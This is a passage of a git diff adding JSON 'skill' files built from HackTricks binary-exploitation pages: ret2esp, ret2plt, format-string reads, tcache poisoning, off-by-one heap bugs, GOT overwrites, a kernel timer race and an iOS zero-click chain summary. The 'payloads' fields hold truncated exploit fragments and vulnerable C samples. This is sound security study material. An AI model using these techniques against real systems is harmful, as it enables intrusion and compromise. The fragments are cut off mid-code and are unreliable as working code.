+ "**Because the ESP (Stack Pointer) always points to the top of the stack**, this technique involves replacing the EIP (Instruction Pointer) with the address of a **`jmp esp`** or **`call esp`** instruction. By doing this, the shellcode is placed right after the overwritten EIP. When the `ret` instruction executes, ESP points to the next address, precisely where the shellcode is stored.",
+ "If **Address Space Layout Randomization (ASLR)** is not enabled in Windows or Linux, it's possible to use `jmp esp` or `call esp` instructions found in shared libraries. However, with [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) active, one might need to look within the vulnerable program itself for these instructions (and you might need to defeat [**PIE**](../common-binary-protections-and-bypasses/pie/index.html)).",
+ "Moreover, being able to place the shellcode **after the EIP corruption**, rather than in the middle of the stack, ensures that any `push` or `pop` instructions executed during the function's operation don't interfere with the shellcode. This interference could happen if the shellcode were placed in the middle of the function's stack.",
+ "### Lacking space",
+ "If you are lacking space to write after overwriting RIP (maybe just a few bytes), write an initial **`jmp`** shellcode like:",
+ "```armasm",
+ "sub rsp, 0x30",
+ "jmp rsp",
+ "And write the shellcode early in the stack.",
+ "### Example",
+ "You can find an example of this technique in [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp) with a final exploit like:",
+ "```python"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_4e69077629ec.json b/skills/binary_exploitation_4e69077629ec.json
new file mode 100644
index 0000000..418e3f4
--- /dev/null
+++ b/skills/binary_exploitation_4e69077629ec.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_4e69077629ec",
+ "category": "binary-exploitation",
+ "title": "posix cpu timers toctou cve 2025 38352",
+ "description": "# POSIX CPU Timers TOCTOU race (CVE-2025-38352)\n\n{{#include ../../banners/hacktricks-training.md}}\n\nThis page documents a TOCTOU race condition in Linux/Android POSIX CPU timers that can corrupt timer state and crash the kernel, and under some circumstances be steered toward privilege escalation.\n\n- Affected component: kernel/time/posix-cpu-timers.c\n- Primitive: expiry vs deletion race under task exit\n- Config sensitive: CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n (IRQ-context expiry path)\n\nQuick intern",
+ "payloads": [
+ "# POSIX CPU Timers TOCTOU race (CVE-2025-38352)",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "This page documents a TOCTOU race condition in Linux/Android POSIX CPU timers that can corrupt timer state and crash the kernel, and under some circumstances be steered toward privilege escalation.",
+ "- Affected component: kernel/time/posix-cpu-timers.c",
+ "- Primitive: expiry vs deletion race under task exit",
+ "- Config sensitive: CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n (IRQ-context expiry path)",
+ "Quick internals recap (relevant for exploitation)",
+ "- Three CPU clocks drive accounting for timers via cpu_clock_sample():",
+ "- CPUCLOCK_PROF: utime + stime",
+ "- CPUCLOCK_VIRT: utime only",
+ "- CPUCLOCK_SCHED: task_sched_runtime()",
+ "- Timer creation wires a timer to a task/pid and initializes the timerqueue nodes:",
+ "static int posix_cpu_timer_create(struct k_itimer *new_timer) {",
+ "struct pid *pid;",
+ "rcu_read_lock();"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/linux-kernel-exploitation/posix-cpu-timers-toctou-cve-2025-38352.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_50436455692e.json b/skills/binary_exploitation_50436455692e.json
new file mode 100644
index 0000000..b9516f0
--- /dev/null
+++ b/skills/binary_exploitation_50436455692e.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_50436455692e",
+ "category": "binary-exploitation",
+ "title": "first fit",
+ "description": "# First Fit\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n## **First Fit**\n\nWhen you free memory in a program using glibc, different \"bins\" are used to manage the memory chunks. Here's a simplified explanation of two common scenarios: unsorted bins and fastbins.\n\n### Unsorted Bins\n\nWhen you free a memory chunk that's not a fast chunk, it goes to the unsorted bin. This bin acts like a list where new freed chunks are added to the front (the \"head\"). When you request a new chunk of memory,",
+ "payloads": [
+ "# First Fit",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "## **First Fit**",
+ "When you free memory in a program using glibc, different \"bins\" are used to manage the memory chunks. Here's a simplified explanation of two common scenarios: unsorted bins and fastbins.",
+ "### Unsorted Bins",
+ "When you free a memory chunk that's not a fast chunk, it goes to the unsorted bin. This bin acts like a list where new freed chunks are added to the front (the \"head\"). When you request a new chunk of memory, the allocator looks at the unsorted bin from the back (the \"tail\") to find a chunk that's big enough. If a chunk from the unsorted bin is bigger than what you need, it gets split, with the front part being returned and the remaining part staying in the bin.",
+ "Example:",
+ "- You allocate 300 bytes (`a`), then 250 bytes (`b`), then free `a` and request again 250 bytes (`c`).",
+ "- When you free `a`, it goes to the unsorted bin.",
+ "- If you then request 250 bytes again, the allocator finds `a` at the tail and splits it, returning the part that fits your request and keeping the rest in the bin.",
+ "- `c` will be pointing to the previous `a` and filled with the `a`'s contents.",
+ "char *a = malloc(300);",
+ "char *b = malloc(250);",
+ "free(a);",
+ "char *c = malloc(250);"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/libc-heap/use-after-free/first-fit.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_50b5f2ebe0bc.json b/skills/binary_exploitation_50b5f2ebe0bc.json
new file mode 100644
index 0000000..8d47b9e
--- /dev/null
+++ b/skills/binary_exploitation_50b5f2ebe0bc.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_50b5f2ebe0bc",
+ "category": "binary-exploitation",
+ "title": "ret2plt",
+ "description": "# Ret2plt\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n## Basic Information\n\nThe goal of this technique would be to **leak an address from a function from the PLT** to be able to bypass ASLR. This is because if, for example, you leak the address of the function `puts` from the libc, you can then **calculate where is the base of `libc`** and calculate offsets to access other functions such as **`system`**.\n\nThis can be done with a `pwntools` payload such as ([**from here**](https://ir0n",
+ "payloads": [
+ "# Ret2plt",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "The goal of this technique would be to **leak an address from a function from the PLT** to be able to bypass ASLR. This is because if, for example, you leak the address of the function `puts` from the libc, you can then **calculate where is the base of `libc`** and calculate offsets to access other functions such as **`system`**.",
+ "This can be done with a `pwntools` payload such as ([**from here**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/plt_and_got)):",
+ "```python",
+ "# 32-bit ret2plt",
+ "payload = flat(",
+ "b'A' * padding,",
+ "elf.plt['puts'],",
+ "elf.symbols['main'],",
+ "elf.got['puts']",
+ "# 64-bit",
+ "payload = flat(",
+ "b'A' * padding,"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_50b675beb0ad.json b/skills/binary_exploitation_50b675beb0ad.json
new file mode 100644
index 0000000..a137500
--- /dev/null
+++ b/skills/binary_exploitation_50b675beb0ad.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_50b675beb0ad",
+ "category": "binary-exploitation",
+ "title": "arm64 static linear map kaslr bypass",
+ "description": "# Linux arm64 Static Linear Map KASLR Bypass\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Overview\n\nAndroid kernels built for arm64 almost universally enable **`CONFIG_ARM64_VA_BITS=39`** (3-level paging) and **`CONFIG_MEMORY_HOTPLUG=y`**. With only 512 GiB of kernel virtual space available, the Linux developers chose to anchor the **linear map** at the lowest possible kernel VA so that future hot-plugged RAM can simply extend the mapping upward. Since commit `1db780bafa4c`, arm64 no l",
+ "payloads": [
+ "# Linux arm64 Static Linear Map KASLR Bypass",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Overview",
+ "Android kernels built for arm64 almost universally enable **`CONFIG_ARM64_VA_BITS=39`** (3-level paging) and **`CONFIG_MEMORY_HOTPLUG=y`**. With only 512 GiB of kernel virtual space available, the Linux developers chose to anchor the **linear map** at the lowest possible kernel VA so that future hot-plugged RAM can simply extend the mapping upward. Since commit `1db780bafa4c`, arm64 no longer even attempts to randomize that placement, which means:",
+ "- `PAGE_OFFSET = 0xffffff8000000000` is compiled in.",
+ "- `PHYS_OFFSET` is sourced from the exported `memstart_addr`, which on stock Android devices is effectively constant (0x80000000 today).",
+ "As a consequence, **every physical page has a deterministic linear-map virtual address that is independent of the KASLR slide**:",
+ "#define phys_to_virt(p) (((unsigned long)(p) - 0x80000000UL) | 0xffffff8000000000UL)",
+ "If an attacker can learn or influence a physical address (kernel object, PFN from `/proc/pagemap`, or even a user-controlled page), they instantly know the corresponding kernel virtual address without leaking the randomized primary kernel mapping.",
+ "## Reading `memstart_addr` and confirming the transform",
+ "`memstart_addr` is exported in `/proc/kallsyms` and can be read on rooted devices or via any arbitrary kernel-read primitive. Project Zero used Jann Horn's tracing-BPF helper (`bpf_arb_read`) to dump it directly:",
+ "```bash",
+ "grep memstart /proc/kallsyms",
+ "# ... obtains memstart_addr virtual address",
+ "./bpf_arb_read 8"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/linux-kernel-exploitation/arm64-static-linear-map-kaslr-bypass.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_5498e3e7d9dc.json b/skills/binary_exploitation_5498e3e7d9dc.json
new file mode 100644
index 0000000..ab7f1a5
--- /dev/null
+++ b/skills/binary_exploitation_5498e3e7d9dc.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_5498e3e7d9dc",
+ "category": "binary-exploitation",
+ "title": "ret2lib + printf leak arm64",
+ "description": "# Ret2lib + Printf leak - arm64\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n## Ret2lib - NX bypass with ROP (no ASLR)\n\n```c\n#include \n\nvoid bof()\n{\n char buf[100];\n printf(\"\\nbof>\\n\");\n fgets(buf, sizeof(buf)*3, stdin);\n}\n\nvoid main()\n{\n printfleak();\n bof();\n}\n```\n\nCompile without canary:\n\n```bash\nclang -o rop-no-aslr rop-no-aslr.c -fno-stack-protector\n# Disable aslr\necho 0 | sudo tee /proc/sys/kernel/randomize_va_space\n```\n\n### Find offset - x30 offset\n\nCreat",
+ "payloads": [
+ "# Ret2lib + Printf leak - arm64",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "## Ret2lib - NX bypass with ROP (no ASLR)",
+ "#include ",
+ "void bof()",
+ "char buf[100];",
+ "printf(\"\\nbof>\\n\");",
+ "fgets(buf, sizeof(buf)*3, stdin);",
+ "void main()",
+ "printfleak();",
+ "bof();",
+ "Compile without canary:",
+ "```bash",
+ "clang -o rop-no-aslr rop-no-aslr.c -fno-stack-protector",
+ "# Disable aslr"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_5938ee9bb42a.json b/skills/binary_exploitation_5938ee9bb42a.json
new file mode 100644
index 0000000..4bc1fa4
--- /dev/null
+++ b/skills/binary_exploitation_5938ee9bb42a.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_5938ee9bb42a",
+ "category": "binary-exploitation",
+ "title": "format strings template",
+ "description": "# Format Strings Template\n\n{{#include ../../banners/hacktricks-training.md}}\n\n```python\nfrom pwn import *\nfrom time import sleep\n\n###################\n### CONNECTION ####\n###################\n\n# Define how you want to exploit the binary\nLOCAL = True\nREMOTETTCP = False\nREMOTESSH = False\nGDB = False\n\n# Configure vulnerable binary\nLOCAL_BIN = \"./tyler\"\nREMOTE_BIN = \"./tyler\" #For ssh\n\n# In order to exploit the format string you may need to append/prepend some string to the payload\n# configure them he",
+ "payloads": [
+ "# Format Strings Template",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "```python",
+ "from pwn import *",
+ "from time import sleep",
+ "###################",
+ "### CONNECTION ####",
+ "###################",
+ "# Define how you want to exploit the binary",
+ "LOCAL = True",
+ "REMOTETTCP = False",
+ "REMOTESSH = False",
+ "GDB = False",
+ "# Configure vulnerable binary",
+ "LOCAL_BIN = \"./tyler\""
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/format-strings/format-strings-template.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_5b06e0ea57bf.json b/skills/binary_exploitation_5b06e0ea57bf.json
new file mode 100644
index 0000000..dce05dc
--- /dev/null
+++ b/skills/binary_exploitation_5b06e0ea57bf.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_5b06e0ea57bf",
+ "category": "binary-exploitation",
+ "title": "elf tricks",
+ "description": "# ELF Basic Information\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Program Headers\n\nThe describe to the loader how to load the **ELF** into memory:\n\n```bash\nreadelf -lW lnstat\n\nElf file type is DYN (Position-Independent Executable file)\nEntry point 0x1c00\nThere are 9 program headers, starting at offset 64\n\nProgram Headers:\n Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align\n PHDR 0x000040 0x0000000000000040 0x0000000000000040 0x0001f",
+ "payloads": [
+ "# ELF Basic Information",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Program Headers",
+ "The describe to the loader how to load the **ELF** into memory:",
+ "```bash",
+ "readelf -lW lnstat",
+ "Elf file type is DYN (Position-Independent Executable file)",
+ "Entry point 0x1c00",
+ "There are 9 program headers, starting at offset 64",
+ "Program Headers:",
+ "Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align",
+ "PHDR 0x000040 0x0000000000000040 0x0000000000000040 0x0001f8 0x0001f8 R 0x8",
+ "INTERP 0x000238 0x0000000000000238 0x0000000000000238 0x00001b 0x00001b R 0x1",
+ "[Requesting program interpreter: /lib/ld-linux-aarch64.so.1]",
+ "LOAD 0x000000 0x0000000000000000 0x0000000000000000 0x003f7c 0x003f7c R E 0x10000"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_5bc0a7f6eb28.json b/skills/binary_exploitation_5bc0a7f6eb28.json
new file mode 100644
index 0000000..69ec44a
--- /dev/null
+++ b/skills/binary_exploitation_5bc0a7f6eb28.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_5bc0a7f6eb28",
+ "category": "binary-exploitation",
+ "title": "memory tagging extension mte",
+ "description": "# Memory Tagging Extension (MTE)\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\n**Memory Tagging Extension (MTE)** is designed to enhance software reliability and security by **detecting and preventing memory-related errors**, such as buffer overflows and use-after-free vulnerabilities. MTE, as part of the **ARM** architecture, provides a mechanism to attach a **small tag to each memory allocation** and a **corresponding tag to each pointer** referencing that memory. T",
+ "payloads": [
+ "# Memory Tagging Extension (MTE)",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "**Memory Tagging Extension (MTE)** is designed to enhance software reliability and security by **detecting and preventing memory-related errors**, such as buffer overflows and use-after-free vulnerabilities. MTE, as part of the **ARM** architecture, provides a mechanism to attach a **small tag to each memory allocation** and a **corresponding tag to each pointer** referencing that memory. This approach allows for the detection of illegal memory accesses at runtime, significantly reducing the risk of exploiting such vulnerabilities for executing arbitrary code.",
+ "### **How Memory Tagging Extension Works**",
+ "MTE operates by **dividing memory into small, fixed-size blocks, with each block assigned a tag,** typically a few bits in size.",
+ "When a pointer is created to point to that memory, it gets the same tag. This tag is stored in the **unused bits of a memory pointer**, effectively linking the pointer to its corresponding memory block.",
+ "
",
+ "When a program accesses memory through a pointer, the MTE hardware checks that the **pointer's tag matches the memory block's tag**. If the tags **do not match**, it indicates an **illegal memory access.**",
+ "### MTE Pointer Tags",
+ "Tags inside a pointer are stored in 4 bits inside the top byte:",
+ "
",
+ "Therefore, this allows up to **16 different tag values**.",
+ "### MTE Memory Tags",
+ "Every **16B of physical memory** have a corresponding **memory tag**."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_65b16c48dc51.json b/skills/binary_exploitation_65b16c48dc51.json
new file mode 100644
index 0000000..ee45cd1
--- /dev/null
+++ b/skills/binary_exploitation_65b16c48dc51.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_65b16c48dc51",
+ "category": "binary-exploitation",
+ "title": "ret2syscall arm64",
+ "description": "# Ret2syscall - ARM64\n\n{{#include ../../../banners/hacktricks-training.md}}\n\nFind an introduction to arm64 in:\n\n\n{{#ref}}\n../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md\n{{#endref}}\n\n## Code\n\nWe are going to use the example from the page:\n\n\n{{#ref}}\n../../stack-overflow/ret2win/ret2win-arm64.md\n{{#endref}}\n\n```c\n#include \n#include \n\nvoid win() {\n printf(\"Congratulations!\\n\");\n}\n\nvoid vulner",
+ "payloads": [
+ "# Ret2syscall - ARM64",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "Find an introduction to arm64 in:",
+ "{{#ref}}",
+ "../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md",
+ "{{#endref}}",
+ "## Code",
+ "We are going to use the example from the page:",
+ "{{#ref}}",
+ "../../stack-overflow/ret2win/ret2win-arm64.md",
+ "{{#endref}}",
+ "#include ",
+ "#include ",
+ "void win() {",
+ "printf(\"Congratulations!\\n\");"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_66155f5b319a.json b/skills/binary_exploitation_66155f5b319a.json
new file mode 100644
index 0000000..256af78
--- /dev/null
+++ b/skills/binary_exploitation_66155f5b319a.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_66155f5b319a",
+ "category": "binary-exploitation",
+ "title": "imessage media parser zero click coreaudio pac bypass",
+ "description": "# iMessage Media Parser Zero-Click \u2192 CoreAudio RCE \u2192 PAC/RPAC \u2192 Kernel \u2192 CryptoTokenKit Abuse\n\n{{#include ../../banners/hacktricks-training.md}}\n\nThis page summarizes a modern iOS zero-click attack surface and an observed end-to-end exploitation chain abusing iMessage automatic media parsing to compromise CoreAudio, bypass BlastDoor, defeat Pointer Authentication (PAC) via an RPAC path, escalate to kernel, and finally abuse CryptoTokenKit for unauthorized key uses.\n\n> Warning: This is an educati",
+ "payloads": [
+ "# iMessage Media Parser Zero-Click \u2192 CoreAudio RCE \u2192 PAC/RPAC \u2192 Kernel \u2192 CryptoTokenKit Abuse",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "This page summarizes a modern iOS zero-click attack surface and an observed end-to-end exploitation chain abusing iMessage automatic media parsing to compromise CoreAudio, bypass BlastDoor, defeat Pointer Authentication (PAC) via an RPAC path, escalate to kernel, and finally abuse CryptoTokenKit for unauthorized key uses.",
+ "> Warning: This is an educational summary to help defenders, researchers, and red teams understand the techniques. Do not use offensively.",
+ "## High-level chain",
+ "- Delivery vector: a malicious audio attachment (e.g., .amr / MP4 AAC) sent via iMessage/SMS.",
+ "- Auto-ingestion: iOS auto-parses media for previews and conversions without user interaction.",
+ "- Parser bug: malformed structures hit CoreAudio\u2019s AudioConverterService and corrupt heap memory.",
+ "- Code exec in media context: RCE inside the media parsing process; reported to bypass BlastDoor isolation in specific paths (e.g., \u201cknown sender\u201d framing path).",
+ "- PAC/RPAC bypass: once arbitrary R/W is achieved, a PAC bypass in the RPAC path enables stable control flow under arm64e PAC.",
+ "- Kernel escalation: the chain converts userland exec into kernel exec (e.g., via wireless/AppleBCMWLAN code paths and AMPDU handling as seen in logs below).",
+ "- Post-exploitation: with kernel, abuse CryptoTokenKit to perform signing with Secure Enclave\u2013backed keys, read sensitive data paths (Keychain contexts), intercept messages/2FA, silently authorize actions, and enable stealth surveillance (mic/camera/GPS) without prompts.",
+ "## iMessage/BlastDoor attack surface notes",
+ "BlastDoor is a hardened service designed to parse untrusted message content. However, observed logs indicate paths where protections may be bypassed when messages are framed from a \u201cknown sender\u201d and when additional filters (e.g., Blackhole) are relaxed:",
+ "```text"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/ios-exploiting/imessage-media-parser-zero-click-coreaudio-pac-bypass.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_66d61d7ea52e.json b/skills/binary_exploitation_66d61d7ea52e.json
new file mode 100644
index 0000000..1ccf7c2
--- /dev/null
+++ b/skills/binary_exploitation_66d61d7ea52e.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_66d61d7ea52e",
+ "category": "binary-exploitation",
+ "title": "off by one overflow",
+ "description": "# Off by one overflow\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\nHaving just access to a 1B overflow allows an attacker to modify the `size` field from the next chunk. This allows to tamper which chunks are actually freed, potentially generating a chunk that contains another legit chunk. The exploitation is similar to [double free](double-free.md) or overlapping chunks.\n\nThere are 2 types of off by one vulnerabilities:\n\n- Arbitrary byte: This kind allows to overwri",
+ "payloads": [
+ "# Off by one overflow",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "Having just access to a 1B overflow allows an attacker to modify the `size` field from the next chunk. This allows to tamper which chunks are actually freed, potentially generating a chunk that contains another legit chunk. The exploitation is similar to [double free](double-free.md) or overlapping chunks.",
+ "There are 2 types of off by one vulnerabilities:",
+ "- Arbitrary byte: This kind allows to overwrite that byte with any value",
+ "- Null byte (off-by-null): This kind allows to overwrite that byte only with 0x00",
+ "- A common example of this vulnerability can be seen in the following code where the behavior of `strlen` and `strcpy` is inconsistent, which allows set a 0x00 byte in the beginning of the next chunk.",
+ "- This can be expoited with the [House of Einherjar](house-of-einherjar.md).",
+ "- If using Tcache, this can be leveraged to a [double free](double-free.md) situation.",
+ "",
+ "Off-by-null",
+ "// From https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/off_by_one/",
+ "int main(void)",
+ "char buffer[40]=\"\";"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/libc-heap/off-by-one-overflow.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_67b28a9308c7.json b/skills/binary_exploitation_67b28a9308c7.json
new file mode 100644
index 0000000..46dde2f
--- /dev/null
+++ b/skills/binary_exploitation_67b28a9308c7.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_67b28a9308c7",
+ "category": "binary-exploitation",
+ "title": "aw2exec got plt",
+ "description": "# WWW2Exec - GOT/PLT\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## **Basic Information**\n\n### **GOT: Global Offset Table**\n\nThe **Global Offset Table (GOT)** is a mechanism used in dynamically linked binaries to manage the **addresses of external functions**. Since these **addresses are not known until runtime** (due to dynamic linking), the GOT provides a way to **dynamically update the addresses of these external symbols** once they are resolved.\n\nEach entry in the GOT corresponds to ",
+ "payloads": [
+ "# WWW2Exec - GOT/PLT",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## **Basic Information**",
+ "### **GOT: Global Offset Table**",
+ "The **Global Offset Table (GOT)** is a mechanism used in dynamically linked binaries to manage the **addresses of external functions**. Since these **addresses are not known until runtime** (due to dynamic linking), the GOT provides a way to **dynamically update the addresses of these external symbols** once they are resolved.",
+ "Each entry in the GOT corresponds to a symbol in the external libraries that the binary may call. When a **function is first called, its actual address is resolved by the dynamic linker and stored in the GOT**. Subsequent calls to the same function use the address stored in the GOT, thus avoiding the overhead of resolving the address again.",
+ "### **PLT: Procedure Linkage Table**",
+ "The **Procedure Linkage Table (PLT)** works closely with the GOT and serves as a trampoline to handle calls to external functions. When a binary **calls an external function for the first time, control is passed to an entry in the PLT associated with that function**. This PLT entry is responsible for invoking the dynamic linker to resolve the function's address if it has not already been resolved. After the address is resolved, it is stored in the **GOT**.",
+ "**Therefore,** GOT entries are used directly once the address of an external function or variable is resolved. **PLT entries are used to facilitate the initial resolution** of these addresses via the dynamic linker.",
+ "## Get Execution",
+ "### Check the GOT",
+ "Get the address to the GOT table with: **`objdump -s -j .got ./exec`**",
+ ".png>)",
+ "Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef\u27a4 x/20x 0xADDR_GOT`",
+ " (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (2) (2).png>)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_72e9e7e6ecac.json b/skills/binary_exploitation_72e9e7e6ecac.json
new file mode 100644
index 0000000..b952d65
--- /dev/null
+++ b/skills/binary_exploitation_72e9e7e6ecac.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_72e9e7e6ecac",
+ "category": "binary-exploitation",
+ "title": "format strings arbitrary read example",
+ "description": "# Format Strings - Arbitrary Read Example\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Read Binary Start\n\n### Code\n\n```c\n#include \n\nint main(void) {\n char buffer[30];\n\n fgets(buffer, sizeof(buffer), stdin);\n\n printf(buffer);\n return 0;\n}\n```\n\nCompile it with:\n\n```python\nclang -o fs-read fs-read.c -Wno-format-security -no-pie\n```\n\n### Exploit\n\n```python\nfrom pwn import *\n\np = process('./fs-read')\n\npayload = f\"%11$s|||||\".encode()\npayload += p64(0x00400000)\n\np.sendli",
+ "payloads": [
+ "# Format Strings - Arbitrary Read Example",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Read Binary Start",
+ "### Code",
+ "#include ",
+ "int main(void) {",
+ "char buffer[30];",
+ "fgets(buffer, sizeof(buffer), stdin);",
+ "printf(buffer);",
+ "return 0;",
+ "Compile it with:",
+ "```python",
+ "clang -o fs-read fs-read.c -Wno-format-security -no-pie",
+ "### Exploit",
+ "```python"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_74755676064f.json b/skills/binary_exploitation_74755676064f.json
new file mode 100644
index 0000000..326c8b4
--- /dev/null
+++ b/skills/binary_exploitation_74755676064f.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_74755676064f",
+ "category": "binary-exploitation",
+ "title": "tcache bin attack",
+ "description": "# Tcache Bin Attack\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\nFor more information about what is a Tcache bin check this page:\n\n\n{{#ref}}\nbins-and-memory-allocations.md\n{{#endref}}\n\nFirst of all, note that the Tcache was introduced in Glibc version 2.26.\n\nThe **Tcache attack** (also known as **Tcache poisoning**) proposed in the [**guyinatuxido page**](https://guyinatuxedo.github.io/29-tcache/tcache_explanation/index.html) is very similar to the fast bin attack wh",
+ "payloads": [
+ "# Tcache Bin Attack",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "For more information about what is a Tcache bin check this page:",
+ "{{#ref}}",
+ "bins-and-memory-allocations.md",
+ "{{#endref}}",
+ "First of all, note that the Tcache was introduced in Glibc version 2.26.",
+ "The **Tcache attack** (also known as **Tcache poisoning**) proposed in the [**guyinatuxido page**](https://guyinatuxedo.github.io/29-tcache/tcache_explanation/index.html) is very similar to the fast bin attack where the goal is to overwrite the pointer to the next chunk in the bin inside a freed chunk to an arbitrary address so later it's possible to **allocate that specific address and potentially overwrite pointes**.",
+ "However, nowadays, if you run the mentioned code you will get the error: **`malloc(): unaligned tcache chunk detected`**. So, it's needed to write as address in the new pointer an aligned address (or execute enough times the binary so the written address is actually aligned).",
+ "### Tcache indexes attack",
+ "Usually it's possible to find at the beginning of the heap a chunk containing the **amount of chunks per index** inside the tcache and the address to the **head chunk of each tcache index**. If for some reason it's possible to modify this information, it would be possible to **make the head chunk of some index point to a desired address** (like `__malloc_hook`) to then allocated a chunk of the size of the index and overwrite the contents of `__malloc_hook` in this case.",
+ "## Examples",
+ "- CTF [https://guyinatuxedo.github.io/29-tcache/dcquals19_babyheap/index.html](https://guyinatuxedo.github.io/29-tcache/dcquals19_babyheap/index.html)",
+ "- **Libc info leak**: It's possible to fill the tcaches, add a chunk into the unsorted list, empty the tcache and **re-allocate the chunk from the unsorted bin** only overwriting the first 8B, leaving the **second address to libc from the chunk intact so we can read it**."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/libc-heap/tcache-bin-attack.md"
+ ]
+}
\ No newline at end of file
